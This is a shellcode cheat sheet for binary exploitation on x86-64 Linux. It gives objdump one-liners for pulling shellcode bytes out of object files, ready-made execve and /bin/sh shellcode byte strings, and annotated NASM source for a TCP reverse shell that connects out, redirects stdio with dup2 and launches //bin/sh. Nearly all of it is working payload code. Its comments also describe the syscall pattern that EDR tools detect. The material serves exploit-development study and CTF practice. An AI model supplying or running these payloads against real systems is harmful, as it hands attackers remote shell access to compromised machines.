Shellcodes for Binary Exploitation

 

Extract the shellcode bytes from the object file using objdump

objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"

for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
Execve

"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
/bin/sh 

"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
X86/64-bit TCP Reverse Shell 

# Assemble, link, and extract the shellcode bytes
nasm -f elf64 stack.nasm -o stack.o
objdump -M intel -D stack.o
ld stack.o -o stack
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo

# Shellcode source starts here

section .text
global _start

;-----------------------------------------------------------------------
; _start — x86-64 Linux, NASM Intel syntax, raw syscalls only (no libc).
; Sequence: socket(AF_INET, SOCK_STREAM, 0)
;        -> connect(fd, {AF_INET, port 4444, 127.0.0.1}, 16)
;        -> dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)
;        -> execve("//bin/sh", NULL, NULL)
; Never returns and never calls anything, so no stack frame is built.
; No syscall return value is checked.
; Detection note: socket -> connect -> three dup2 -> execve issued back
; to back by one process, with no intervening library calls, is the
; behavioural pattern syscall-tracing / EDR rules key on.
;-----------------------------------------------------------------------
_start: 

; clearing rax, rdi, rsi, rdx (xor reg,reg is the zeroing idiom)
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

;socket(AF_INET, SOCK_STREAM, 0)
add rax, 41 ; rax = 41 = __NR_socket (x86-64 table)
add rdi, 2  ; rdi = AF_INET (2)
add rsi, 1  ; rsi = SOCK_STREAM (1); rdx = protocol 0, already cleared
syscall     ; rax = socket fd (or -errno, not checked)

mov rdi, rax ; keep the socket fd in rdi: first argument to connect and dup2

; preparing structure for connect — struct sockaddr_in built on the stack,
; low address first: sin_family (2) | sin_port (2) | sin_addr (4).
; sin_addr = 127.0.0.1: in memory the bytes are 7f 00 00 01, i.e. the
; little-endian dword 0x0100007f. (The original note said 127.1.1.1, which
; would be 0x0101017f — the value actually pushed is loopback 127.0.0.1.)
push 0x0100007f
; sin_port is stored big-endian (network order), so the word pushed is
; byte-swapped: port 4444 = 0x115c -> push 0x5c11.
; The original note's alternative, port 9999 = 0x270f, would be 0x0f27.
push word 0x5c11
push word 0x2   ; sin_family = AF_INET (2)

;connect(fd, &sockaddr_in, 16)
mov rsi, rsp    ; rsi = &sockaddr_in (only 8 bytes were pushed; the 8 bytes
                ; above them stand in for sin_zero, which the kernel ignores)
add rdx, 0x10   ; addrlen = sizeof(struct sockaddr_in) = 16
xor rax, rax
add rax, 42     ; rax = 42 = __NR_connect
syscall         ; return not checked

; dup2 loop: redirect fd 2, 1, 0 onto the socket so the shell's
; stdio goes over the connection. rsi counts 2 -> 1 -> 0.
; NOTE(review): `loop` is also an x86 mnemonic; NASM may reject or
; mis-parse a label with that name — a distinct local label such as
; `.dup_loop` avoids the ambiguity.
xor rsi, rsi
add rsi, 2
loop:
		xor rax, rax
		add rax, 33      ; rax = 33 = __NR_dup2; dup2(rdi = sockfd, rsi = fd)
		syscall          ; syscall clobbers only rcx/r11, so rdi/rsi survive
		dec rsi          ; next lower fd
		jns loop         ; stop once rsi goes negative (after fd 0)

;execve("//bin/sh", NULL, NULL)
xor rax, rax
mov rdx, rax    ; rdx = envp = NULL (argument 3)
mov rsi, rdx    ; rsi = argv = NULL (argument 2); Linux accepts this as empty

push rax        ; 8 zero bytes: NUL terminator for the path string below
; 0x68732f6e69622f2f in little-endian memory order is 2f 2f 62 69 6e 2f 73 68
; = "//bin/sh"; the doubled slash pads the path to exactly 8 bytes and
; resolves the same as "/bin/sh". rbx is callee-saved, but that is
; irrelevant here since this code never returns.
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp    ; rdi = pathname = rsp -> "//bin/sh\0"

add rax, 59     ; rax = 59 = __NR_execve
syscall         ; does not return on success




